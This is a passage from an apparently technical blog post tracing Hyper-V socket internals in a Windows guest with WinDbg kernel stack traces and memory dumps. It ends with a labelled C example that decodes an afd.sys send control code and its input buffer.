<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">27 nt!PspSystemThreadStartup</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">28 nt!KiStartSystemThread</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Then, in the guest OS, nt!IoRegisterDeviceInterface is called:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00 nt!IoRegisterDeviceInterface</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 Wdf01000!Mx::MxRegisterDeviceInterface</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 Wdf01000!FxDeviceInterface::Register</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 Wdf01000!FxDeviceInterface::Register</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 Wdf01000!imp_WdfDeviceCreateDeviceInterface</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">05 vmbus!RootStartDeviceInterfaceByContext</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">06 hvsocket!VmbusTlXPartProcessNewConnection</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">07 vmbus!RootNotifyDeviceInterfaceArrival</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">08 Wdf01000!FxWorkItem::WorkItemHandler</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">09 Wdf01000!FxWorkItem::WorkItemThunk</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0a nt!IopProcessWorkItem</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0b nt!ExpWorkerThread</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0c nt!PspSystemThreadStartup</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0d nt!KiStartSystemThread</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">NTSTATUS IoRegisterDeviceInterface(</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PDEVICE_OBJECT PhysicalDeviceObject,</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ </span><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">const</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> GUID *InterfaceClassGuid,</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_opt_ PUNICODE_STRING ReferenceString,</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _Out_ PUNICODE_STRING SymbolicLinkName</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> !devobj @rcx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Device object (ffffe38bf77145b0) is for:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 00000013 \Driver\ACPI DriverObject ffffe38bf79d5a00</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Current Irp 00000000 RefCount 0 Type 00000032 Flags 00001040</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">SecurityDescriptor ffffa48e93c56dc0 DevExt ffffe38bf7a71c60 DevObjExt ffffe38bf7714700 DevNode ffffe38bf79d1c50 </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ExtensionFlags (0000000000) </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Characteristics (0x00000180) FILE_AUTOGENERATED_DEVICE_NAME, FILE_DEVICE_SECURE_OPEN</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AttachedDevice (Upper) ffffe38bf7af5970 \Driver\vmbus</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Device queue is not busy.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> dx _GUID @rdx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(*((_GUID *)0xffffa48ea28888f0)) : {B1D00D3E-FE10-4570-AD62-7648779D7A1B} [Type: _GUID]</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> dx UNICODE_STRING @r8</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(*((UNICODE_STRING *)0xffffa48ea2888900)) : "{b1d00d3e-fe10-4570-ad62-7648779d7a1b}-{00000000-0000-0000-0000-000000000000}-0000" [Type: UNICODE_STRING]</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Then the nt!PnpNotifyDeviceClassChange function is executed:</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> k</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> # Child-SP RetAddr Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00 nt!PnpNotifyDeviceClassChange</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 nt!PnpDeviceEventWorker+0x263</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 nt!ExpWorkerThread+0xe9</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 nt!PspSystemThreadStartup+0x41</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 nt!KiStartSystemThread+0x16</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> dc @rcx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffa48e`9f13f3f8 cb3a4004 11d046f0 60008fb0 3f051397 .@:..F.....`...?</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> dx _GUID @rdx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(*((_GUID *)0xffffa48ea0dcd0a8)) : {B1D00D3E-FE10-4570-AD62-7648779D7A1B} [Type: _GUID]</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> du @rdx+10</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffa48e`a0dcd0b8 "\??\ACPI#VMBus#0#{b1d00d3e-fe10-"</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffa48e`a0dcd0f8 "4570-ad62-7648779d7a1b}\{b1d00d3"</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffa48e`a0dcd138 "e-fe10-4570-ad62-7648779d7a1b}-{"</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffa48e`a0dcd178 "00000000-0000-0000-0000-00000000"</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffa48e`a0dcd1b8 "0000}-0000"</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The ClientExample.exe thread stack at the same moment:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Child-SP RetAddr Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ffffd180`715e1070 fffff800`081690d5 nt!KxDispatchInterrupt+0x122</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ffffd180`715e11b0 fffff800`08169d32 nt!KiDpcInterruptBypass+0x25</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ffffd180`715e11c0 fffff800`07e6a003 nt!KiVmbusInterrupt2+0x212 (TrapFrame @ ffffd180`715e11c0)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ffffd180`715e1358 fffff809`c86a17ff 0xfffff800`07e6a003</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ffffd180`715e1360 fffff809`c86a19b4 winhv!WinHvpHypercall+0x57</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ffffd180`715e13a0 fffff809`c86a1f96 winhv!WinHvpSimplePoolHypercall+0x40</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ffffd180`715e13e0 fffff809`c8628f92 winhv!WinHvPostMessage+0x8e</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ffffd180`715e1470 fffff809`c8628664 vmbus!PncSendMessage+0x42</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ffffd180`715e14a0 fffff809`c863c08d vmbus!XPartSendMessage+0x60</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ffffd180`715e14f0 fffff809`c8669b24 vmbus!ChTlConnectRequest+0x4d</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ffffd180`715e1530 fffff809`c8665e67 hvsocket!VmbusTlXPartChildSetupConnection+0xb4</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ffffd180`715e1580 fffff809`c8662fe5 hvsocket!VmbusTlSetupConnection+0x18b</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ffffd180`715e15d0 fffff809`c98970e2 hvsocket!VmbusTlProviderConnect+0x615</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ffffd180`715e1680 fffff800`0842e180 afd!AfdConnect+0x6b2</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ffffd180`715e1820 fffff800`0842d064 nt!IopSynchronousServiceTail+0x1a0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ffffd180`715e18e0 fffff800`0842c9e6 nt!IopXxxControlFile+0x674</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ffffd180`715e1a20 fffff800`08170493 nt!NtDeviceIoControlFile+0x56</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ffffd180`715e1a90 00000000`61e7222c nt!KiSystemServiceCopyEnd+0x13 (TrapFrame @ ffffd180`715e1b00)</span></div>
<br /><ol start="6" style="margin-bottom: 0pt; margin-top: 0pt;"><ol start="6" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; list-style-type: decimal; margin-left: -36pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Send</span></div>
</li>
</ol>
</ol>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 18pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The most functional part is data transmission and reception. Let's consider </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">send</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">; </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">recv</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, I think, should not differ in essence. We will look at the client application. In user mode, mswsock!WSPSend calls ntdll!NtDeviceIoControlFile:</span></div>
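<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 18pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The IoControlCode and InputBufferLength values in the NtDeviceIoControlFile call below are easier to read once decoded. The following C program is an added example, not code from the original post or from the hvsocket sample: it decodes an afd.sys control code into its device, operation and method fields and parses the 32-bit AFD_SEND_INFO input buffer that accompanies an AFD send. Assumptions: afd.sys has no public header, so the operation numbers, the non-standard code layout and the AFD_SEND_INFO fields are taken from public reverse-engineering (the ReactOS afd/shared.h header); the client on this page is treated as a 32-bit process because its user-mode addresses and return address fit in 32 bits; the 16-byte input buffer used as sample input is constructed, not captured from the page.</span></div>

```c
/* Added example (not part of the original post): decode the control code
 * that mswsock passes to NtDeviceIoControlFile for send() and parse the
 * 32-bit AFD_SEND_INFO input buffer that goes with it.
 *
 * Assumption: afd.sys has no public header. The operation numbers, the code
 * layout and the AFD_SEND_INFO fields below come from public
 * reverse-engineering (ReactOS afd/shared.h), not from a Microsoft SDK. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* afd.sys builds its codes as (0x12 << 12) | (operation << 2) | method,
 * not with the documented CTL_CODE() macro, so a generic IOCTL decoder
 * reports device type 1 for 0x1201F instead of FILE_DEVICE_NETWORK. */
#define AFD_DEVICE_FIELD 0x12u

struct afd_ioctl {
    unsigned device;     /* 0x12 for every afd control code */
    unsigned operation;  /* AFD_* operation number */
    unsigned method;     /* 0 buffered, 1 in-direct, 2 out-direct, 3 neither */
    int is_afd;          /* 1 when the device field matches afd's */
};

struct afd_ioctl afd_decode(uint32_t code)
{
    struct afd_ioctl r;
    r.device    = (code >> 12) & 0xFFFu;
    r.operation = (code >> 2) & 0x3FFu;
    r.method    = code & 0x3u;
    r.is_afd    = (r.device == AFD_DEVICE_FIELD);
    return r;
}

const char *afd_operation_name(unsigned op)
{
    static const char *const names[] = {
        "AFD_BIND", "AFD_CONNECT", "AFD_START_LISTEN", "AFD_WAIT_FOR_LISTEN",
        "AFD_ACCEPT", "AFD_RECV", "AFD_RECV_DATAGRAM", "AFD_SEND",
        "AFD_SEND_DATAGRAM", "AFD_SELECT",
    };
    return op < sizeof names / sizeof names[0] ? names[op] : "unknown";
}

/* AFD_SEND_INFO as a 32-bit process lays it out: four 32-bit fields, which
 * is why InputBufferLength is 0x10 on this page. BufferArray is a user-mode
 * pointer to an array of WSABUF {ULONG len; CHAR *buf}; with method 3
 * (METHOD_NEITHER) it reaches afd.sys unvalidated and the driver has to
 * probe both the array and every buffer it points to. */
struct afd_send_info32 {
    uint32_t buffer_array;  /* PAFD_WSABUF, 32-bit user pointer */
    uint32_t buffer_count;
    uint32_t afd_flags;
    uint32_t tdi_flags;
};

static uint32_t le32(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Parse a raw little-endian input buffer; returns 0 if it is too short. */
int afd_parse_send_info32(const uint8_t *buf, size_t len, struct afd_send_info32 *out)
{
    if (len < 16)
        return 0;
    out->buffer_array = le32(buf);
    out->buffer_count = le32(buf + 4);
    out->afd_flags    = le32(buf + 8);
    out->tdi_flags    = le32(buf + 12);
    return 1;
}

/* Constructed sample input (not captured from the page): one WSABUF at the
 * hypothetical user address 0x00dbf440, no flags. */
const uint8_t afd_sample_input[16] = {
    0x40, 0xf4, 0xdb, 0x00,  0x01, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00,  0x00, 0x00, 0x00, 0x00,
};

int main(void)
{
    const uint32_t code = 0x1201F;          /* IoControlCode from the page */
    struct afd_ioctl io = afd_decode(code);
    struct afd_send_info32 si;

    printf("0x%05X: device=0x%X op=%u (%s) method=%u\n", code, io.device,
           io.operation, afd_operation_name(io.operation), io.method);
    if (afd_parse_send_info32(afd_sample_input, sizeof afd_sample_input, &si))
        printf("AFD_SEND_INFO: BufferArray=0x%08X BufferCount=%u AfdFlags=0x%X TdiFlags=0x%X\n",
               si.buffer_array, si.buffer_count, si.afd_flags, si.tdi_flags);
    return 0;
}
```

<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 18pt;">
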